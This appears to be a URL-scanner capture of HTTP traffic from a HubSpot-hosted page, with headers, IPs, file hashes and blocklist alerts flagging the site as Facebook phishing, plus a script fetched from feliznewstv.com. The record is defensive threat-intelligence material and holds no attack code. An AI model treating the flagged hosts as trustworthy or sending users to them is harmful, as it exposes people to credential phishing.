report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=LXtVK5Dl7YggckiNaOMkJVV81j7MFG9ouX%2FxilGIXy8aNiuCJJpslufvObIjUUnr8ZXl81fzED2nTvChk7p0wOEmreg%2FUL9npJse95G%2FcmD7ac%2FlqKacGeYKqbXOVMtSfI9zQJwFGWc%3D"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
strict-transport-security: max-age=31536000; includeSubDomains; preload
server: cloudflare
cf-ray: 74acb65ddcc3b50b-OSL
content-encoding: br
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  Unicode text, UTF-8 text, with very long lines (64286), with no line terminators
Size:   49633
Md5:    9808b118269fbc08320e2057bc16b503
Sha1:   edb89d14c8684686fd408c3501b74da7b1332d63
Sha256: c0c408c05aadc83b8757d81cd2892cb35277eeaf9649eda5241279b2fedc8c21
                                        
                                            GET /__ptq.gif?k=1&sd=1280x1024&cd=24-bit&cs=UTF-8&ln=en-us&bfp=931822577&v=1.1&a=26246913&pi=53071520739&ct=standard-page&ccu=http%3A%2F%2Fappnewstv.hs-sites-eu1.com&cpi=53071520739&lpi=53071520739&lvi=53071520739&pu=http%3A%2F%2Fappnewstv.hs-sites-eu1.com%2F&t=app+news+tv&cts=1663196136124&vi=a7312f7f5841285b0adc6f5d12aa1228&nc=true&u=205882892.a7312f7f5841285b0adc6f5d12aa1228.1663196136122.1663196136122.1663196136122.1&b=205882892.1.1663196136122&cc=15 HTTP/1.1 
Host: track-eu1.hubspot.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://appnewstv.hs-sites-eu1.com/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         172.65.240.166
HTTP/2 200 OK
content-type: image/gif
                                        
date: Wed, 14 Sep 2022 22:55:50 GMT
content-length: 45
cf-ray: 74acb66588e495f1-ARN
accept-ranges: bytes
cache-control: no-cache, no-store, no-transform
last-modified: Wed, 14 Sep 2022 22:55:50 GMT
strict-transport-security: max-age=31536000; includeSubDomains; preload
vary: Accept-Encoding
cf-cache-status: MISS
access-control-allow-credentials: false
p3p: CP="NOI CUR ADM OUR NOR STA NID"
x-hubspot-correlation-id: bf469c19-4697-4016-ab11-35425c8651c9
x-robots-tag: none
set-cookie: __cf_bm=Yjzf25f5pE4ogN7c6HN78J.SLqOUaN6BoyT9ngCG93U-1663196150-0-Aa0UrBKiwhd3C3qILNlIMljhEbDdPKhZ5fffJWS7RayM/NGY7bachLOEg0D22yhZ8W5po8bnelP0Oan1b2W/Im8=; path=/; expires=Wed, 14-Sep-22 23:25:50 GMT; domain=.hubspot.com; HttpOnly; Secure; SameSite=None
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=JqgOXdw%2BmlNJENcufVTskKnQ2hwuIUY3wLAMQrcwY3HxShsHjHbfEIWHu9VtKtZtxDnORHvAq1v7gGBVWMmrGg1DKXbU7Px9hdxze1TZWopzO83dm8PzzhaMv50gS5O1jU5BP5LE4Q%3D%3D"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
server: cloudflare
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  GIF image data, version 89a, 1 x 1\012- data
Size:   45
Md5:    c8817d472077ebfc04593c1fa019d32d
Sha1:   e1e86f41c86c7b9cd2e8b76c6a925a1a3e7e3247
Sha256: dc111a70984a9eda00752b06277113029ef288f1125c31eff2477413e15e8aa4
                                        
                                            GET /embed/v3/counters.gif?key=collected-forms-embed-js-form-bind&count=1 HTTP/1.1 
Host: forms-eu1.hsforms.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://appnewstv.hs-sites-eu1.com/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         172.65.232.43
HTTP/2 200 OK
content-type: image/gif
                                        
date: Wed, 14 Sep 2022 22:55:50 GMT
content-length: 35
x-trace: 2B04ECF2CAC5084B2406877B8DC58C5ACD1C7538B5000000000000000000
cache-control: max-age=0, no-cache, no-store
vary: Accept-Encoding
x-hubspot-correlation-id: 50476885-8044-4611-84bb-1d146c6e07b8
access-control-allow-credentials: false
access-control-expose-headers: X-Origin-Hublet
x-robots-tag: none
cf-cache-status: DYNAMIC
strict-transport-security: max-age=31536000; includeSubDomains; preload
server: cloudflare
cf-ray: 74acb6660f5895f6-ARN
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  GIF image data, version 89a, 1 x 1\012- data
Size:   35
Md5:    c2196de8ba412c60c22ab491af7b1409
Sha1:   5fbd472222feb8a22cf5b8aa5dc5b8e13af88e2b
Sha256: 6adc3d4c1056996e4e8b765a62604c78b1f867cceb3b15d0b9bedb7c4857f992
                                        
                                            GET /location/ HTTP/1.1 
Host: feliznewstv.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://appnewstv.hs-sites-eu1.com/
Connection: keep-alive
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         147.182.144.225
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Server: nginx
Date: Wed, 14 Sep 2022 22:55:50 GMT
Content-Length: 468
Connection: keep-alive
Vary: Accept-Encoding
Content-Encoding: gzip


--- Additional Info ---
Magic:  ASCII text, with CRLF line terminators
Size:   468
Md5:    6f1497d5364a6cfda0e81dd10d409ebf
Sha1:   4db66111b55d4b33203ba3a888e12ba6163cdfdf
Sha256: 3cf8f3dd6ae89d4970edad8007c999d712327c53c1da0998db6f32c7ad99c4e2
                                        
                                            GET /widget/josvip222 HTTP/1.1 
Host: whos.amung.us
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://appnewstv.hs-sites-eu1.com/

                                         
                                         104.22.74.171
HTTP/1.1 307 Temporary Redirect
Content-Type: text/html; charset=UTF-8
                                        
Date: Wed, 14 Sep 2022 22:55:51 GMT
Transfer-Encoding: chunked
Connection: keep-alive
cache-control: no-cache, no-store, must-revalidate
location: http://widgets.amung.us/classic/00/8.png
CF-Cache-Status: DYNAMIC
Server: cloudflare
CF-RAY: 74acb6670b9cf14e-ARN

                                        
                                            GET /classic/00/8.png HTTP/1.1 
Host: widgets.amung.us
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://appnewstv.hs-sites-eu1.com/
Connection: keep-alive

                                         
                                         104.22.75.171
HTTP/1.1 200 OK
Content-Type: image/png
                                        
Date: Wed, 14 Sep 2022 22:55:51 GMT
Content-Length: 1431
Connection: keep-alive
last-modified: Sun, 13 Jun 2010 09:03:09 GMT
etag: "4c149ecd-597"
expires: Mon, 12 Sep 2022 13:29:34 GMT
cache-control: max-age=2678400
access-control-allow-origin: *
CF-Cache-Status: HIT
Age: 293177
Accept-Ranges: bytes
Vary: Accept-Encoding
Server: cloudflare
CF-RAY: 74acb667fec595e2-ARN


--- Additional Info ---
Magic:  PNG image data, 81 x 29, 8-bit colormap, non-interlaced\012- data
Size:   1431
Md5:    3664423d2ad0a1545fa63d62a8551393
Sha1:   4d05ca47d92aebd285ee79d7433f984e8d6ec2fb
Sha256: c1dc2cc26ca102520d01cf8e6e5404659d58f92c6c344b983a9cd68a983e5b72
                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         23.36.76.226
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "A4F07D30F29E785E2EE605AEE590AB928C3E1412F4DC61FF163CF32445CC3AF4"
Last-Modified: Tue, 13 Sep 2022 16:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=5780
Expires: Thu, 15 Sep 2022 00:32:11 GMT
Date: Wed, 14 Sep 2022 22:55:51 GMT
Connection: keep-alive

                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         23.36.76.226
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "A4F07D30F29E785E2EE605AEE590AB928C3E1412F4DC61FF163CF32445CC3AF4"
Last-Modified: Tue, 13 Sep 2022 16:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=5780
Expires: Thu, 15 Sep 2022 00:32:11 GMT
Date: Wed, 14 Sep 2022 22:55:51 GMT
Connection: keep-alive

                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         23.36.76.226
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "A4F07D30F29E785E2EE605AEE590AB928C3E1412F4DC61FF163CF32445CC3AF4"
Last-Modified: Tue, 13 Sep 2022 16:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=5780
Expires: Thu, 15 Sep 2022 00:32:11 GMT
Date: Wed, 14 Sep 2022 22:55:51 GMT
Connection: keep-alive

                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         23.36.76.226
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "A4F07D30F29E785E2EE605AEE590AB928C3E1412F4DC61FF163CF32445CC3AF4"
Last-Modified: Tue, 13 Sep 2022 16:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=5780
Expires: Thu, 15 Sep 2022 00:32:11 GMT
Date: Wed, 14 Sep 2022 22:55:51 GMT
Connection: keep-alive

                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         23.36.76.226
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "A4F07D30F29E785E2EE605AEE590AB928C3E1412F4DC61FF163CF32445CC3AF4"
Last-Modified: Tue, 13 Sep 2022 16:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=5780
Expires: Thu, 15 Sep 2022 00:32:11 GMT
Date: Wed, 14 Sep 2022 22:55:51 GMT
Connection: keep-alive

                                        
                                            GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2Fb3545c74-7af3-4ad8-815b-6a50681a2362.jpeg HTTP/1.1 
Host: img-getpocket.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         34.120.237.76
HTTP/2 200 OK
content-type: image/jpeg
                                        
server: nginx
content-length: 10633
x-amzn-requestid: 2a8ec7f2-8704-440e-9966-ae4643d6aa5c
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: YdyhcF6RIAMFTEg=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-6322313c-4d1bfab72580e62231978193;Sampled=0
x-amzn-remapped-date: Wed, 14 Sep 2022 19:53:32 GMT
x-amz-cf-pop: HIO50-C1, SEA73-P1
x-cache: Miss from cloudfront
x-amz-cf-id: Dr0K5GobFSc2ooWzPsbe6tfoTbF_NglaVuT8z-cM-B0AufMh_PohhQ==
via: 1.1 da5952aa802df39905ceb16592e9698a.cloudfront.net (CloudFront), 1.1 2ab6211e66998c8b58132661a7e3cade.cloudfront.net (CloudFront), 1.1 google
date: Wed, 14 Sep 2022 20:21:13 GMT
age: 9278
etag: "13d42d455f5131b7b861b97eb3f0e91236d4d222"
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Size:   10633
Md5:    f42b72c3fd66a6758ebcf0ca8cc1a046
Sha1:   13d42d455f5131b7b861b97eb3f0e91236d4d222
Sha256: 4a07fcacde77dc890164fda9f295b61af6947b2d7f3f84f64749d93e3a1e5b99
                                        
                                            GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F2d547c90-3ccc-4c25-a8e5-de1d932a8cfb.jpeg HTTP/1.1 
Host: img-getpocket.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         34.120.237.76
HTTP/2 200 OK
content-type: image/jpeg
                                        
server: nginx
content-length: 3951
x-amzn-requestid: 65c15365-1bff-4dd2-a651-33683a033e05
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: YE9_oHP_oAMF3Fw=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-63184397-148253910e5cd21b0e436b09;Sampled=0
x-amzn-remapped-date: Wed, 07 Sep 2022 07:09:11 GMT
x-amz-cf-pop: SEA73-P1
x-cache: Hit from cloudfront
x-amz-cf-id: wzHSKob2n4WsbIoi6eJdCptVrefJxBEVANMp-WZSm6HsOI7bPUwaDA==
via: 1.1 4dde8ec6d6c12741888c2d3a059d4a2e.cloudfront.net (CloudFront), 1.1 32d624dbeb2a8b7f24dbe49007e37c90.cloudfront.net (CloudFront), 1.1 google
date: Wed, 14 Sep 2022 22:19:28 GMT
age: 2183
etag: "cab4d850cd2bc5b3e1570ae837a58382e6eae5ec"
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Size:   3951
Md5:    aaf675adec05212317877a5f479d11a7
Sha1:   cab4d850cd2bc5b3e1570ae837a58382e6eae5ec
Sha256: cb4eb5b406f1ec01e3094d0519d8e4e7a469056bb898e2c47d48378e4b2b261d
                                        
                                            GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F1e20bf1d-c24c-4dc0-9796-f2f870591ff2.jpeg HTTP/1.1 
Host: img-getpocket.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         34.120.237.76
HTTP/2 200 OK
content-type: image/jpeg
                                        
server: nginx
content-length: 6484
x-amzn-requestid: cefd7270-c8ca-4ced-b9bd-52353fbefa5a
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: YBIIUHOZIAMF9wQ=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-6316ba35-7d4c4c53090c83ea3fadbf4e;Sampled=0
x-amzn-remapped-date: Tue, 06 Sep 2022 03:10:45 GMT
x-amz-cf-pop: SEA73-P1
x-cache: Hit from cloudfront
x-amz-cf-id: V0CJvbFSNJT2eHVOeCkdZNStr6eZg3EO0YTNyTUsmiirYMm9gfzBKg==
via: 1.1 41e349e25dc4bc856d0e5d2c162428a0.cloudfront.net (CloudFront), 1.1 567b44ed19c8caed2570b7bcd8c70034.cloudfront.net (CloudFront), 1.1 google
date: Wed, 14 Sep 2022 21:42:19 GMT
age: 4412
etag: "098d000aebd7ba0637fe420b9dfdacd2146af240"
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Size:   6484
Md5:    cb7c9c7f4257ab79526157f3ba507d6e
Sha1:   098d000aebd7ba0637fe420b9dfdacd2146af240
Sha256: 74fd95bcffcaf6919e8bca4184978340bef089528f9d184e7d88e1fd4c83288b
                                        
                                            GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2Fcede4553-e9f1-4ab1-9d0e-2f0bfae52d09.jpeg HTTP/1.1 
Host: img-getpocket.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         34.120.237.76
HTTP/2 200 OK
content-type: image/jpeg
                                        
server: nginx
content-length: 8010
x-amzn-requestid: 498e0a9a-7fd6-4a08-9111-91020cbebdf0
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: YeB59FiWIAMFX9g=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-632249d9-737b49125f659cb64d1de09a;Sampled=0
x-amzn-remapped-date: Wed, 14 Sep 2022 21:38:33 GMT
x-amz-cf-pop: HIO50-C1, SEA73-P1
x-cache: Hit from cloudfront
x-amz-cf-id: ByjIeUOe8ws46kVoLkd08LpLIdiWkKJoIFxeXTGaHYB863tOGGlBuQ==
via: 1.1 efe54e8b68e074d39b2ecd249f85100a.cloudfront.net (CloudFront), 1.1 01147dcc35d57fc0238a3c1700c13f16.cloudfront.net (CloudFront), 1.1 google
date: Wed, 14 Sep 2022 21:39:22 GMT
age: 4589
etag: "6c1ed76ca3c29af41ef4031eaea6b9040465517b"
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Size:   8010
Md5:    5a76383eca28732b4f7847139f12a5cb
Sha1:   6c1ed76ca3c29af41ef4031eaea6b9040465517b
Sha256: 5d205ffc5a3177111f640f270fd0204eef790e531f69299d3de075f9387df966
                                        
                                            GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2Fafb10f81-8409-401c-bd62-3ec01954600c.jpeg HTTP/1.1 
Host: img-getpocket.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         34.120.237.76
HTTP/2 200 OK
content-type: image/jpeg
                                        
server: nginx
content-length: 6770
x-amzn-requestid: b7c9513c-b8ba-41c7-9f9a-0a9d2266172d
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: X7FlpEVRIAMFygA=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-63144fbd-7a4408363cdc46c9355a9f47;Sampled=0
x-amzn-remapped-date: Sun, 04 Sep 2022 07:11:57 GMT
x-amz-cf-pop: SEA73-P1
x-cache: Hit from cloudfront
x-amz-cf-id: fqj5PljprRruE1jwYAVwKoHkjys-RakUjzuV67_Ued6T4et99JPxPg==
via: 1.1 41e349e25dc4bc856d0e5d2c162428a0.cloudfront.net (CloudFront), 1.1 02d90bf99fd6253b329a53c82f19e224.cloudfront.net (CloudFront), 1.1 google
date: Wed, 14 Sep 2022 21:42:04 GMT
age: 4427
etag: "f6b742549ea35a4b1345cffb937a8bbcceee08ef"
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Size:   6770
Md5:    2e5f57ba37fac4e6047a9a321a8ec084
Sha1:   f6b742549ea35a4b1345cffb937a8bbcceee08ef
Sha256: f8c67c54806e47089b9ba297599e3e4cde1fd2e2e38b76acc9e8de0e99d7b77e
                                        
                                            GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F1266c973-1bdd-4969-82ca-1106689fe929.jpeg HTTP/1.1 
Host: img-getpocket.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         34.120.237.76
HTTP/2 200 OK
content-type: image/jpeg
                                        
server: nginx
content-length: 5078
x-amzn-requestid: b6177371-a8ba-4541-a48d-21bd806e866e
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: X0erUHT-IAMFWKg=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-6311ab15-157ed5b700e0aad5481f5c0f;Sampled=0
x-amzn-remapped-date: Fri, 02 Sep 2022 07:04:53 GMT
x-amz-cf-pop: SEA73-P1
x-cache: Hit from cloudfront
x-amz-cf-id: Vlo8vCUrKDtvhAGHSYKMmPk-wVNgx9OlU3ZVrpgG0tgk8ZBllAtXNQ==
via: 1.1 9b311162717b41c968f6f00426d88aaa.cloudfront.net (CloudFront), 1.1 68fadeb91f97256bb67b03bfca74d830.cloudfront.net (CloudFront), 1.1 google
date: Wed, 14 Sep 2022 20:21:58 GMT
age: 9233
etag: "af100925cba1be716fd2200715d6136bd7f0c5bc"
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Size:   5078
Md5:    f50c34bc30a732593e8fe465055a44ff
Sha1:   af100925cba1be716fd2200715d6136bd7f0c5bc
Sha256: 703049736ccc8815945d69634059c4cd39533417e0969107d460c36a6787c761
                                        
                                            POST /_hcms/perf HTTP/1.1 
Host: appnewstv.hs-sites-eu1.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-type: application/json
Content-Length: 739
Origin: http://appnewstv.hs-sites-eu1.com
Connection: keep-alive
Referer: http://appnewstv.hs-sites-eu1.com/
Cookie: __hstc=205882892.a7312f7f5841285b0adc6f5d12aa1228.1663196136122.1663196136122.1663196136122.1; hubspotutk=a7312f7f5841285b0adc6f5d12aa1228; __hssrc=1; __hssc=205882892.1.1663196136122

                                         
                                         104.18.33.253
HTTP/1.1 200 OK
Content-Type: text/plain; charset=utf-8
                                        
Date: Wed, 14 Sep 2022 22:55:53 GMT
Content-Length: 2
Connection: keep-alive
CF-Ray: 74acb677fc090b69-OSL
Vary: Accept-Encoding
CF-Cache-Status: DYNAMIC
Access-Control-Allow-Credentials: false
X-HubSpot-Correlation-Id: 84c6a58f-f491-406e-b85b-3bb6bc8e5b11
X-Robots-Tag: none
X-Trace: 2B7495CA25361B8C818AB9AC6FE27935BA3F5E72EB000000000000000000
Server: cloudflare
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400


--- Additional Info ---
Magic:  ASCII text, with no line terminators
Size:   2
Md5:    e0aa021e21dddbd6d8cecec71e9cf564
Sha1:   9ce3bd4224c8c1780db56b4125ecf3f24bf748b7
Sha256: 565339bc4d33d72817b583024112eb7f5cdf3e5eef0252d6ec1b9c9a94e12bb3

Alerts:
  Blocklists:
    - openphish: Facebook, Inc.
    - fortinet: Phishing
                                        
                                            GET /26246913.js HTTP/1.1 
Host: js-eu1.hs-banner.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://appnewstv.hs-sites-eu1.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         172.65.202.201
HTTP/2 200 OK
content-type: text/javascript; charset=UTF-8
                                        
date: Wed, 14 Sep 2022 22:55:49 GMT
x-amz-id-2: eMvK/+B+42bBRulR0IJXLilgHC+cniLzaOvjYRJ/vPUvuhfzQdr5DZbhrA9aZpZloYv8hRCJ5Mc=
x-amz-request-id: TZJG9K9055D38NE7
last-modified: Tue, 13 Sep 2022 13:50:52 GMT
etag: W/"32ad209e131aa4d3350f4e63295ad005"
x-amz-server-side-encryption: AES256
cache-control: max-age=300, public
x-amz-version-id: UBvwYk_We_pJ5IIipKbbbJNIhGE5mW1n
access-control-allow-origin: https://appnewstv.hs-sites-eu1.com
access-control-allow-methods: GET, OPTIONS, PUT, POST, DELETE, PATCH, HEAD
